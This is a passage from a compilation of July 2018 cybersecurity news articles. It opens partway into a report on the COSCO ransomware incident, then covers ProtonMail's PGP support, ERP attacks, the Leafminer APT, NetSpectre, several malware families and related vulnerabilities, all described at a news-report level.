According to the popular security expert Kevin Beaumont‏, the ransomware has infected a portion of the infrastructure that hosts the company website (cosco-usa.com), phone and email systems, and WAN and VPN gateways.

Catalin Cimpanu
@campuscodi
· 26 Jul
Replying to @GossiTheDog
Their global website is still working fine. Only their US site is down from what it appears.http://lines.coscoshipping.com/home/News/detail/15325081261286611042/50000000000000231?id=50000000000000231 …

Kevin Beaumont

@GossiTheDog
Yes, it is only Cosco Americas Inc (CAI) impacted. Anything on this network: https://ipinfo.io/AS32604 - includes their website http://www.cosco-usa.com , their phone system, WAN and VPN gateways, email etc.

12:54 AM - Jul 26, 2018
1
See Kevin Beaumont's other Tweets
Twitter Ads info and privacy

Kevin Beaumont

@GossiTheDog
· 26 Jul
Replying to @GossiTheDog
If anybody from Cosco is reading I help with anything like this free of charge for the insight gained, send me an email if you want.

Kevin Beaumont

@GossiTheDog
Cosco have put out a statement confirming the issue. I understand they’re now on their 4th day of downtime for CAI (Cosco Americas Inc) business unit. https://www.itwire.com/security/83772-cosco-s-us-arm-hit-by-windows-ransomware.html …

9:26 AM - Jul 26, 2018
Cosco's US arm hit by Windows ransomware
The North American arm of Chinese shipping conglomerate Cosco has been hit by Windows ransomware, affecting communications at its US locations.

itwire.com
17
See Kevin Beaumont's other Tweets
Twitter Ads info and privacy
At the time of writing the affected U.S. systems still appear to be offline.

The good news is that the attack doesn’t appear severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”


ProtonMail launches Address Verification and full PGP support
28.7.2018 securityaffairs Crypto

Address Verification allows you to be sure you are securely communicating with the right person, while PGP support adds encrypted email interoperability.
Starting with the latest release of ProtonMail on web (v3.14), iOS and Android (v1.9), and the latest versions of the ProtonMail IMAP/SMTP Bridge, ProtonMail now supports Address Verification, along with full PGP interoperability and support. In this article, we’ll discuss these two new features in detail, and how they can dramatically improve email security and privacy.

Address Verification
When ProtonMail first launched in 2014, our goal was to make email encryption ubiquitous by making it easy enough for anybody to use. This is no easy feat, and that’s probably why it had never been done before. Our guiding philosophy is that the most secure systems in the world don’t actually benefit society if nobody can use them, and because of this, we made a number of design decisions for the sake of better usability.

One of these decisions was to make encryption key management automatic and invisible to the user. While this made it possible for millions of people around the world to start using encrypted email without any understanding of what an encryption key is, the resulting architecture required a certain level of trust in ProtonMail.

While a certain level of trust is always necessary when you use online services, our goal is to minimize the amount of trust required so that a compromise of ProtonMail doesn’t lead to a compromise of user communications. This is the philosophy behind our use of end-to-end encryption and zero-access encryption, and it is also the philosophy behind Address Verification.

Prior to the introduction of Address Verification, if ProtonMail was compromised, it would be possible to compromise user communications by sending to the user a fake public encryption key. This could cause email communications to be encrypted in a way that an attacker, holding the corresponding fake private key, could intercept and decrypt the messages (this is also known as a Man-in-the Middle attack, or MITM), despite the fact that the encryption takes place client side.

Address Verification provides an elegant solution to this problem. We consider this to be an advanced security feature and probably not necessary for the casual user, but as there are journalists and activists using ProtonMail for highly sensitive communications, we have made adding Address Verification a priority.

How Address Verification works
Address Verification works by leveraging the Encrypted Contacts feature that we released previously. Starting with the latest version of ProtonMail, when you receive a message from a ProtonMail contact, you now have the option (in the ProtonMail web app) to Trust Public Keys for this contact. Doing so saves the public key for this contact into the encrypted contacts, and as contacts data is not only encrypted, but also digitally signed, it is not possible to tamper with the public encryption key once it has been trusted.

This means that when sending emails to this contact, it is no longer possible for a malicious third party (even ProtonMail) to trick you into using a malicious public key that is different from the one you have trusted. This allows for a much higher level of security between two parties than is possible with any other encrypted email service. You can learn more about using Address Verification in our knowledge base article.

PGP Support
At the same time as Address Verification, we are also launching full support for PGP email encryption. As some of you may know, ProtonMail’s cryptography is already based upon PGP, and we maintain one of the world’s most widely used open source PGP libraries. PGP support is also an advanced feature that we don’t expect most users to use. If you need secure email, the easiest and most secure way to get it is still to get both you and your contact on ProtonMail, or if you are an enterprise, to migrate your business to ProtonMail.

However, for the many out there who still use PGP, the launch of full PGP support will make your life a lot easier. First, any ProtonMail user can now send PGP encrypted emails to non-ProtonMail users by importing the PGP public keys of those contacts. Second, it is also possible to receive PGP email at your ProtonMail account from any other PGP user in the world. You can now export your public key and share it with them.

Therefore, your ProtonMail account can in fact fully replace your existing PGP client. Instead of sharing your existing PGP public key, you can now share the PGP public key associated with your ProtonMail account and receive PGP encrypted emails directly in your ProtonMail account.

If you are an existing PGP user and you would like to keep your existing custom email address (e.g. john@mydomain.com), we’ve got you covered there, too. It is possible to move your email hosting to ProtonMail and import your existing PGP keys for your address, so you don’t need to share new keys and a new email address with your contacts.

If you are using PGP for sensitive purposes, this might actually be preferable to continuing to use your existing PGP client. For one, PGP is fully integrated into ProtonMail, encryption/decryption is fully automated, and the new Address Verification feature is used to protect you against MITM attacks. More importantly though, ProtonMail is not susceptible to the eFail class of vulnerabilities, which have impacted many PGP clients, and our PGP implementations are being actively maintained.

You can find more details about using PGP with ProtonMail here.

Introducing ProtonMail’s public key server
Finally, we are formally launching a public key server to make key discovery easier than ever. If your contact is already using ProtonMail, then key discovery is automatic (and you can use Address Verification to make it even more secure if you want). But if a non-ProtonMail user (like a PGP user) wants to email you securely at your ProtonMail account, they need a way to discover your public encryption key. If they don’t get it from your public profile or website, they are generally out of luck.

Our public key server solves this problem by providing a centralized place to look up the public key of any ProtonMail address (and non-ProtonMail addresses hosted at ProtonMail).

Our public key server can be found at hkps://api.protonmail.ch (!! This link is used for HKP requests and cannot be accessed with a browser. However, if you want to download the public key of a ProtonMail users, simply replace the “username@protonmail.com” with the address you’re looking for and copy/paste the following link into your browser: https://api.protonmail.ch/pks/lookup?op=get&search=username@protonmail.com)

Concluding thoughts on open standards and federation
Today, ProtonMail is the world’s most widely used email encryption system, and for most of our users the addition of Address Verification and PGP support will not change how you use ProtonMail. In particular, setting up PGP (generating encryption keys, sharing them, and getting your contacts to do the same) is simply too complicated, and it is far easier for most people to simply create a ProtonMail account and benefit from end-to-end encryption and zero-access encryption without worrying about details like key management.

Still, launching PGP support is important to us. The beauty of email is that it is federated, meaning that anybody can implement it. It is not controlled by any single entity, it is not centralized, and there is not a single point of failure. While this does constrain email in many ways, it has also made email the most widespread and most successful communication system ever devised.

PGP, because it is built on top of email, is therefore also a federated encryption system. Unlike other encrypted communications systems, such as Signal or Telegram, PGP doesn’t belong to anybody, there is no single central server, and you aren’t forced to use one service over another. We believe encrypted communications should be open and not a walled garden. ProtonMail is now interoperable with practically ANY other past, present, or future email system that supports the OpenPGP standard, and our implementation of this standard is also itself open source.

ProtonMail PGP support

We still have a long way to go before we can make privacy accessible to everyone, and in the coming months and years we will be releasing many more features and products to make this possible. If you would like to support our mission, you can always donate or upgrade to a paid plan.


US-CERT warns of ongoing cyber attacks aimed at ERP applications
28.7.2018 securityaffairs Attack

US-CERT warns of cyber attacks on ERP applications, including Oracle and SAP, and refers an interesting report published by Digital Shadows and Onapsis.
US-CERT warns of cyber attacks on Enterprise resource planning (ERP) solutions such as Oracle and SAP, both nation-state actors and cybercrime syndicates are carrying out hacking campaign against these systems.
The report published by the US-CERT reference analysis conducted by Digital Shadows and Onapsis, titled “ERP Applications Under Fire.“

“Digital Shadows Ltd. and Onapsis Inc. have released a report describing an increase in the exploitation of vulnerabilities in Enterprise Resource Planning (ERP) applications. ERP applications help organizations manage critical business processes—such as product lifecycle management, customer relationship management, and supply chain management.” reads the US-CERT bulletin.

“An attacker can exploit these vulnerabilities to obtain access to sensitive information.”

Unfortunately, there is an impressive number of systems exposed online without necessary security measures, it is quite easy for attackers to find online exploits that could be used to hack them.

“The findings shed light into how nation-state actors, cybercriminals and hacktivist groups are actively attacking these applications and what organizations should
do to mitigate this critical risk.” states the report.

“We observed detailed information on SAP hacking being exchanged at a major Russian-speaking criminal forum, as well as individuals interested in acquiring SAP HANA-specific exploits on the dark web. This goes in hand with an observed 100% increase of public exploits for SAP and Oracle ERP applications over the last three years, and a 160% increase in the activity and interest in ERP-specific vulnerabilities from 2016 to 2017.”

Below the key findings of the report:

Hacktivist groups are actively attacking ERP applications to disrupt critical business operations and penetrate target organizations.

The experts uncovered at least nine operations carried out by hacktivist groups that targeted ERP applications, including SAP and Oracle ERP. The attackers aimed at sabotaging of the applications and compromising business-critical applications.

Cybercriminals have evolved malware to target internal, “behind-the-firewall” ERP applications.

Malware authors have improved their code to target ERP applications to steal SAP user credentials and use them in cyber espionage campaigns.

Nation-state sponsored actors have targeted ERP applications for cyber espionage and sabotage.

Experts collected captured evidence of cyberattacks attributed to nation-state actors.

There has been a dramatic increase in the interest in exploits for SAP
applications, including SAP HANA, in dark web and cybercriminal forums.

Experts observed a spike in the interest in exploits for SAP applications in the Dark Web.

Attacks vectors are evolving, still mainly leveraging known ERP vulnerabilities vs. zero-days.

Threat actors leverage continues to prefer well-known vulnerabilities instead of using zero-day exploits for their attacks.

Cloud, mobile and digital transformations are rapidly expanding the ERP attack surface, and threat actors are taking advantage.

Researchers have identified more than 17,000 SAP and Oracle ERP applications exposed on the internet, most of them operated by world’s largest commercial and government organizations.

ERP applications security report

“Many of these exposed systems run vulnerable versions and unprotected ERP components, which introduce a critical level of risk.” states the report.

Leaked information by third parties and employees can expose internal ERP applications.
Researchers discovered over 500 SAP configuration files on insecure file repositories exposed online, as well as employees sharing ERP login credentials in public forums. Such kind of information is a precious gift for hackers.

Experts recommend organizations to carefully review configurations for known vulnerabilities, change default passwords and enforce strong passwords for users.


Leafminer cyber espionage group targets Middle East
28.7.2018 securityaffairs CyberSpy

Hackers belonging an Iran-linked APT group tracked as ‘Leafminer’ have targeted government and various organizations in the Middle East.
An Iran-linked APT group tracked as ‘Leafminer’ has targeted government and businesses in the Middle.

According to the experts from Symantec, the Leafminer group has been active at least since early 2017.

“Symantec has uncovered the operations of a threat actor named Leafminer that is targeting a broad list of government organizations and business verticals in various regions in the Middle East since at least early 2017. ” reads the analysis published by Symantec.

The experts detected malicious code and hacking tools associated with the cyber espionage group on 44 systems in Saudi Arabia, Lebanon, Israel, Kuwait and other countries.

The extent of the campaigns conducted by the group could be wider, the researchers uncovered a list, written in Iran’s Farsi language, of 809 targets whose systems were scanned by the attackers.

The list groups each entry with organization of interest by geography and industry, in includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Most of the targets were in the financial, government and energy sectors.

Leafminer targets

The hackers used publicly available tools and custom-malware in their attacks.

“On a broad level, it has followed the recent trend among targeted attack groups for “living off the land”—using a mixture of publicly available tools alongside its own custom malware.” continues the report.

“More specifically, it mimicked Dragonfly’s use of a watering hole to harvest network credentials. It also capitalized on the Shadow Brokers release of Inception Framework tools, making use of the leaked Fuzzbunch framework by developing its own exploit payloads for it.”

Researchers discovered that hackers used three main techniques for initial intrusion of target networks:

Compromised web servers used for watering hole attacks
Scans/exploits for vulnerabilities of network services
Dictionary attacks against logins of network services
leafminer

While analyzing the attacks conducted by the group, the experts discovered a download URL for a malware payload used to compromise the victims. The URL pointed out to a compromised web server on the domain e-qht[.]az that had been used to distribute Leafminer malware, payloads, and tools within the group and make them available for download from victim machines.

“As of early June 2018, the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers. In addition to malware and tools, the served files also included uploads of log files seemingly originating from vulnerability scans and post-compromise tools.” continues the report.

“The web shell is a modification of the PhpSpy backdoor and references the author MagicCoder while linking to the (deleted) domain magiccoder.ir. Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army.”

Symantec discovered two custom malware used by the Leafminer group, tracked as Trojan.Imecab and Backdoor.Sorgu, the former provides persistent access with a hardcoded password, the latter implements classic backdoor features.

The group also leveraged a modified version of the popular Mimikatz post-exploitation tool. To avoid detection, the group used a technique dubbed Process Doppelgänging, discovered in December 2017 by researchers from Ensilo security firm.

The technique is a fileless code injection method that exploits a built-in Windows function and an undocumented implementation of the Windows process loader.

“However, Leafminer’s eagerness to learn from others suggests some inexperience on the part of the attackers, a conclusion that’s supported by the group’s poor operational security. It made a major blunder in leaving a staging server publicly accessible, exposing the group’s entire arsenal of tools,” concludes Symantec.


Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution
28.7.2018 securityaffairs
Ransomware

On Thursday, two Dutch brothers were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.
In 2015, Melvin (25) and Dennis van den B. (21), were arrested from a district court in Rotterdam for their alleged involvement in CoinVault ransomware creation and distribution.

On Thursday, the Dutch men were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

The men were accused of breaking into computers, make other people’s work inaccessible, and extortion of 1295 people.

“The court today sentenced two men to hack computers and then extort a large group of people. The suspects were 22 and 18 years old at the time. The court finds that there are very serious facts and that a substantial prison sentence is in place.” reads the Rechtspraak.

“The reasons for not imposing an unconditional prison sentence are the fact that they have cooperated fully in the police investigation and in limiting the (digital) damage, their blank criminal record and that they have not committed any new criminal offenses in the past three years. “

CoinVault ransomware was first spotted in the wild in May 2014, it infected more than 14,000 Windows computers worldwide, most of them in the Netherlands, the US, the UK, Germany, and France.

In 2015, after the arrest of the suspects, the authorities seized the command and control server. Kaspersky researchers released a decryption tool for the ransomware allowing victims to decrypt their files for free.

CoinVault ransomware
The two suspects are Duch brothers and were identified with the help of experts from Kaspersky Labs due to bad opsec. The experts from Kaspersky reverse-engineered the malicious code created by the duo and discovered the full name of one of the suspects and their IP address on the command and control server.

“Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path.” reported Kaspersky.

The two men, that have a clean criminal record, avoided the jail by collaborating in the investigation conducted by the authorities. The course sentenced them with 240 hours of community service, that corresponds to the maximum term of community service condemned people can serve.
The court has also ordered the Dutch brothers to pay compensation to some of their victims.

In order to protect your computer from malware:

Ensure your system software and antivirus definitions are up-to-date.
Avoid visiting suspicious websites.
Regularly backup your important files to a separate drive or storage that are only temporarily connected.
Be on high alert for pop-ups, spam, and unexpected email attachments.


Parasite HTTP RAT implements a broad range of protections and evasion mechanims
28.7.2018 securityaffairs
Virus

Researchers from Proofpoint have discovered a new remote access Trojan (RAT) named Parasite HTTP that implements a broad range of evasion techniques.
The Parasite HTTP RAT has a modular architecture that allows authors to easily add new features. The malware includes sandbox detection, anti-debugging, anti-emulation, and other defense mechanisms.

“Proofpoint researchers recently discovered a new remote access Trojan (RAT) available for sale on underground markets. The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections.” reads the analysis published by Proofpoint.

“The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.”

The Parasite HTTP RAT leverages string obfuscation and a sleep routine to delay execution and check for sandboxes or emulate environments. It first checks if an exception handler has run, then it checks whether between 900ms and two seconds elapsed in response to the routine’s 1-second sleep split into 10ms increments.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” states Proofpoint

In presence of a sandbox, the RAT halts the execution and attempts to make hard the forensic investigations.

“When Parasite HTTP actually does detect a sandbox, it attempts to hide this fact from any observers. It does not simply exit or throw an error, instead making it difficult for researchers to determine why the malware did not run properly and crashed. ” continues the analysis.

Experts observed the malware using code from a public repository for sandbox detection.

The Parasite HTTP RAT is being advertised on an underground forum. Researchers already spotted the threat in attacks in the wild.

The malware was involved in a small email campaign targeting organizations primarily in the information technology, healthcare, and retail industries.

The phishing emails used weaponized Microsoft Word attachments with macros that act as a downloader for the RAT

The Parasite HTTP RAT is written in C programming language. The author claims it has a small size (49kb) and has he no dependencies.

It also implements plugin support and dynamic API calls support.

Communication with the command and control (C&C) is encrypted, the author also offers a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.

It is interesting to note that the malware involves a rare process injection technique. On Windows 7 and newer versions, the malware resolves critical APIs to create registry entries.

The experts highlighted that the Parasite HTTP RAT includes an obfuscated check for debugger breakpoints it also removes hooks on a series of DLLs to complicate the work of malware experts while investigating the threat.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint concludes.


NetSpectre is a remote Spectre attack that allows stealing data over the network
28.7.2018 securityaffairs
Vulnerebility

Researchers discovered a new variant of the Spectre attack, dubbed NetSpectre, that allows to steal data over the network from the target system.
A group of researchers has devised a new variant of the Spectre attack, dubbed NetSpectre, that could allow an attacker to steal data over the network from the target system.

NetSpectre is described as a remote side-channel attack that like the Spectre variant 1 (CVE-2017-5753) exploit a flaw in the speculative execution mechanism. The technique could bypass address-space layout randomization on the remote system and allow the attackers to execute code on the vulnerable system.

The original Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

The researchers that discovered the NetSpectre attack explained that the technique leverages the AVX-based covert channel to capture data at a deficient speed of 60 bits per hour from the target system.

“we present NetSpectre, a generic remote Spectre variant 1 attack. ” reads the research paper.

“Beyond retrofitting existing attacks to a network scenario, we also demonstrate the first Spectre attack which does not use a cache covert channel. Instead, we present a novel high performance AVX-based covert channel that we use in our cachefree Spectre attack. We show that in particular remote Spectre attacks perform significantly better with the AVX-based covert channel, leaking 60 bits per hour from the target system”

An attacker could carry out the Netspectre attack to read arbitrary memory from the systems that have a network interface exposed on the network and that contain the required Spectre gadgets.

“As our NetSpectre attack is mounted over the network, the victim device requires a network interface an attacker can reach. The attacker must be able to send a large number of network packets to the victim,” continues the paper.

“Depending on the gadget location, the attacker has access to either the memory of the entire corresponding application or the entire kernel memory, typically including the entire system memory.” the researchers said.

An attacker just needs to send a series of specially crafted requests to the target machine and observe the timing difference in the network packet response time to leak a secret value from the machine’s memory.

“In contrast to local Spectre attacks, where a single measurement can already be sufficient, NetSpectre attacks require a large number of measurements to distinguish
bits with a certain confidence” continues the paper.

The expert reported the NewSpectre attack to Intel in March and the tech giant addressed the issue with the first set of security patches it has released.


Shipping Giant COSCO Hit by Ransomware
26.7.2018 securityweek
Ransomware

Chinese state-owned shipping and logistics company COSCO was reportedly hit by a piece of ransomware that disrupted some of its systems in the United States.

COSCO, one of the world’s largest shipping companies, described the incident as a “local network breakdown” in the Americas region. The firm says it has suspended connections with other regions while it conducts an investigation.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,” COSCO stated.

While COSCO’s statement does not mention a cyberattack, the company told some news outlets that the disruptions are the result of a ransomware attack.

Cosco responds to ransomware attack

According to researcher Kevin Beaumont‏, the impacted infrastructure hosts COSCO’s website (cosco-usa.com), phone and email systems, and WAN and VPN gateways. The expert pointed out that the company resorted to using Twitter and Yahoo email accounts to communicate with customers.

The company’s U.S. systems still appear to be offline at the time of writing. It’s unclear if this was a targeted attack or if COSCO’s systems became infected as part of an opportunistic ransomware campaign.

If COSCO was truly hit by ransomware – it’s not uncommon for companies to misclassify cyber threats in the initial phases of an investigation – it would not be the first time a major shipping company has fallen victim to this type of attack.

One of the victims of last year’s NotPetya campaign, which caused losses of hundreds of millions of dollars for several major companies, was Danish shipping giant A.P. Moller–Maersk, which revealed that the incident forced its IT team to reinstall software on its entire infrastructure, including 45,000 PCs and 4,000 servers.

As a result of the attack, Maersk employees had to manually process 80 percent of the work volume while systems were being restored and the incident cost the company over $300 million.


Hide ‘N Seek Botnet Targets Smart Homes
26.7.2018 securityweek BotNet

The infamous Hide ‘N Seek botnet is now targeting vulnerabilities in home automation solutions, network security firm Fortinet says.

First observed in January this year, the botnet originally targeted home routers and IP cameras, and had a decentralized, peer-to-peer architecture. By May, the malware had infected over 90,000 unique devices and was targeting far more device types and architectures.

Earlier this month, Qihoo 360's NetLab researchers revealed that the malware also included exploits for AVTECH webcams and Cisco Linksys routers, along with support for OrientDB and CouchDB database servers.

Fortinet new reports that the latest version of the malware has a configuration made up of 110 entries and 9 exploits. More importantly, Fortinet's security researchers reveal, Hide ‘N Seek has added an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability.

The malware implemented the exploit less than a week after it became public, and the same happened with the exploit for the Apache CouchDB remote code execution flaw, Fortinet reveals. The malware also targets a remote code execution in the Belkin NetCam devices.

HomeMatic is a provider of Smart Home devices from the German manufacturer eQ-3. The botnet is targeting the system’s central element, which provides control, monitoring, and configuration options for all HomeMatic devices. This may be the moment when malware starts hacking your house.

“[Hide ‘N Seek] has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet notes.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits.


Apache OpenWhisk Flaws Allowed Attackers to Overwrite Code in IBM Cloud
26.7.2018 securityweek
Vulnerebility

Researchers discovered that two vulnerabilities in the Apache OpenWhisk serverless cloud platform could have allowed malicious actors to overwrite and execute arbitrary code.

Apache OpenWhisk is an open source platform designed to execute code in response to events. The platform handles infrastructure and servers so that users can focus on developing their applications.

IBM’s Cloud Functions function-as-a-service (FaaS) platform is based on Apache OpenWhisk, which made it vulnerable to attacks.

One of the vulnerabilities, tracked as CVE-2018-11757, was discovered by researchers at PureSec. Another issue, CVE-2018-11756, was identified during an investigation into CVE-2018-11757.

Both Apache OpenWhisk developers and IBM have created patches that should prevent attacks.

According to PureSec, the vulnerabilities could have allowed an attacker – under certain conditions – to overwrite the source code of a function being executed in a container and influence subsequent executions in the same container, even if they were carried out by a different user.

Successful exploitation of the vulnerabilities could have resulted in sensitive data getting leaked, or the execution of rogue logic in parallel to a legitimate action’s original logic.

“In addition, an attacker may launch similar attacks in parallel, and in turn affect additional containers, turning the attack into a more persistent or wide-spread threat,” PureSec explained.

Specifically, PureSec says an attacker could have exploited the flaws to obtain sensitive user data, such as passwords, modify or delete information, mine cryptocurrencies, or launch distributed denial-of-service (DDoS) attacks.

OpenWhisk runs each action (function) inside a Docker container and interaction with the function involves a REST interface accessible over port 8080. Each container has two endpoints: /init, which receives the code to be executed, and /run, which receives the arguments for the action and executes the code.

If an attacker could find a vulnerability in the function, such as a remote code execution flaw, they may have been able to force it to launch a local HTTP request to the /init interface on port 8080 and overwrite its source code.

PureSec has published a technical advisory, a blog post, and a video showing how an attack worked against IBM Cloud Functions.

“[PureSec] research showed that for the affected function runtime, an attacker that successfully exploits an already vulnerable function — say by remote code execution or hijacking parameters — may replace the running code inside the container so that subsequent function invocations that reuse that container are now using the new code,” said Rodric Rabbah, one of the creators of Apache OpenWhisk.

“The Apache OpenWhisk community responded quickly to the PureSec research report and audited all the runtimes that are available for functions. This includes Node.js, Python, Swift, Java, PHP, and upcoming additions Ruby and Ballerina. All of the runtimes now detect when a function is attempting to mutate itself from inside a running container (in the way described by PureSec), and uniformly generate a warning message so that the developer can observe and respond to such attempts if their functions are vulnerable to code exploits,” Rabbah added.


US, Australia Work to Improve Cyber Capabilities
26.7.2018 securityweek Cyber

The United States and Australia have signed an agreement that will enable the two allies to conduct research and development to advance their combined cyber capabilities, officials said Tuesday.

Nowhere "is the need for innovation more critical than in cyber, which continues to be a pervasive threat to our militaries and to our businesses," Australian Defence Minister Marise Payne said at a US-Australian summit in California.

US Defense Secretary Jim Mattis said the two countries had signed a memorandum of understanding "to deepen cybersecurity cooperation."

The move comes amid ongoing hacking thefts of sensitive information from military networks, and Russia's continued attempts to subvert democracy in America and elsewhere.

On a separate topic, an Australian reporter asked Mattis whether he thought the Australian navy should conduct a so-called "freedom of navigation" operation to challenge Chinese claims of sovereignty on militarized islets in the South China Sea.

The longstanding issue poses a dilemma for Canberra, with Australian lawmakers debating how much the country should align itself with its longstanding ally America, or pay more heed to the desires of China, its biggest trade partner.

"As far as freedom of navigation decisions by Australia, that's a sovereign decision by a sovereign state," Mattis said.

"We'll just leave that decision with the people of Australia, which is exactly where it belongs."

US Secretary of State Mike Pompeo and his Australian counterpart Julie Bishop also attended the annual summit.

Pompeo was asked about US views of holding Russia to account over its role in the 2014 shootdown of Malaysia Airlines flight MH-17 over Ukraine, when 298 people, including 38 Australian citizens and residents, were killed.

"We need the Russians to continue to be held accountable for that," Pompeo said.

"We take this matter seriously and we committed over these last two days, as we have for the last months, to continue to support every effort through the Joint Investigative Team to hold the perpetrators for this heinous activity accountable."


Customer Identity and Access Management Firm LoginRadius Raises $17 Million
26.7.2018 securityweek IT

Vancouver, Canada-based customer identity and access management (cIAM) firm LoginRadius has raised $17 million Series A funding led by ForgePoint Capital and Microsoft's venture fund, M12.

Founded in 2012 by Rakesh Soni (CEO) and Deepak Gupta (CTO), LoginRadius has concentrated on cIAM -- initially as a social login provider, but now the provider of a multi-faceted, cloud-based, full-function cIAM platform. In its six years it has grown largely without external capital funding (previously raising a total of $2.3 million in initial and seed funding); and it has achieved triple digit growth in its last two years.

LoginRadius LogoWith the demand for customer (as opposed to enterprise) identity and access management growing rapidly, the new funding is designed to ensure that the firm can expand to meet potential requirements. Driving this growth is the ongoing digital transformation of business. Commercial enterprises are no longer satisfied with identity alone, but seek complete identity profiles of their customers in order to provide a more personalized service.

LoginRadius Logo

This makes cIAM a very different requirement to enterprise IAM. While enterprise IAM is concerned with validating the identity of a relatively small and finite number of known company employees, cIAM needs to handle the identity and profile of an infinite number of potentially worldwide internet customers.

"In customer identity you do not control the identity," Soni told SecurityWeek: "you just define it. Control remains with the customers who decide whether they want to keep the identity, destroy the identity, whether they want to access 20 of your brands or just one. And because the system faces outwards rather than inwards, the compliance requirements that are absent in employee identity becomes extremely critical -- especially, for example, with GDPR and the other privacy regulations popping up throughout the world."

The scale is very different. "While most companies have a maximum of a few hundred thousand employees," he continued, "one of our biggest clients has 50 million identities. Those people can access the client from anywhere on the planet, and they need the system to be up and running 24/7. For employee IAM, if the system is down for ten or 15 minutes (especially out of business hours) the impact is minimal. But in the case of cIAM even small downtimes can damage revenue and impact brand satisfaction."

These requirements, he suggests, demand a cloud-based solution. "With increasing customer experience expectations and growing cybersecurity threats, enterprises need a modern cloud-based identity platform that can be the foundation for digital transformation and provide peace of mind when it comes to security. This funding is a testament to LoginRadius' ability to deliver on this promise to our customers and sets the foundation for our future growth."

The firm already has offices in London, San Francisco, Sydney, and Jaipur; and plans to double its workforce over the next 12 months.

"Customer identity is at the intersection of security, digital business and compliance. This requires significant expertise to build and maintain in-house, resulting in extended go-to market time," said Deepak Gupta. "LoginRadius provides the answer to this critical challenge with its out-of-the-box solution."

The LoginRadius cloud platform is built with RESTful APIs and open sourced SDK libraries to allow developers to implement authentication, login interfaces and web SSO without worrying about back-end capabilities such as data management, disaster recovery, performance, system availability and scalability. It already serves more than 700 million identities, and handles 7.5 billion API calls per month.

"Forward-thinking companies are looking for secure, cloud-based identity solutions that can serve a global customer base and handle complex scenarios," commented Nagraj Kashyap, corporate vice president at Microsoft and global head of M12. LoginRadius is "delivering on their promise to simplify customer identity management, which allows enterprise companies to more easily achieve their digital transformation ambitions."


Researchers Resurrect Decade-Old Oracle Solaris Vulnerability
26.7.2018 securityweek
Vulnerebility

One of the Solaris vulnerabilities patched by Oracle with its July 2018 Critical Patch Update (CPU) exists due to an ineffective fix implemented by the company for a flaw first discovered in 2007.

The new vulnerability, identified by researchers at Trustwave and tracked as CVE-2018-2892, impacts the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The security hole has been classified as high severity due to the fact that it allows an attacker to execute code with elevated privileges, but it cannot be exploited remotely without authentication.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation,” Trustwave wrote in an advisory. “The issue is the result of a signedness bug in the bounds checking of the 'SDBC_TEST_INIT' ioctl code sent to the '/dev/sdbc' device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

According to Trustwave, the vulnerability was originally discovered back in 2007 and its details were disclosed in 2009 at the CanSecWest security conference. The root cause of the issue is a combination of several arbitrary memory dereference bugs and an unbounded memory write bug.

Oracle released a patch sometime after the vulnerability was disclosed, but Trustwave discovered that the fix had been ineffective.

Exploitation of CVE-2018-2892 is “almost identical” to the original flaw, the most significant difference being related to the change in architecture between the open source OpenSolaris running on a 32-bit system and Oracle Solaris 11 running on a 64-bit system. Oracle discontinued OpenSolaris after acquiring Sun Microsystems in 2010.

Researchers believe the new vulnerability may exist due to some code introduced for testing purposes.

Another vulnerability patched by Oracle with its latest CPU is CVE-2018-2893, a critical flaw that allows attackers to remotely take control of WebLogic Server systems. The security hole has already been exploited in the wild to deliver cryptocurrency miners, backdoors and other types of malware.


Kronos Banking Trojan Has Returned
26.7.2018 securityweek
Virus

The Kronos banking Trojan is showing renewed strength and has been very active over the past several months, Proofpoint security researchers warn.

Kronos malware was first discovered in 2014 and maintained a steady presence on the threat landscape for a few years, before largely disappearing for a while. It uses man-in-the-browser (MiTB) attacks and webinjects to modify accessed web pages and steal user credentials, account information, and other data. It can also log keystrokes and has hidden VNC functionality.

Last year, the United States Federal Bureau of Investigation said that Kronos was built and distributed by British researcher Marcus Hutchins, who goes by the online handle of MalwareTech and who is known for stopping the WannaCry ransomware attack.

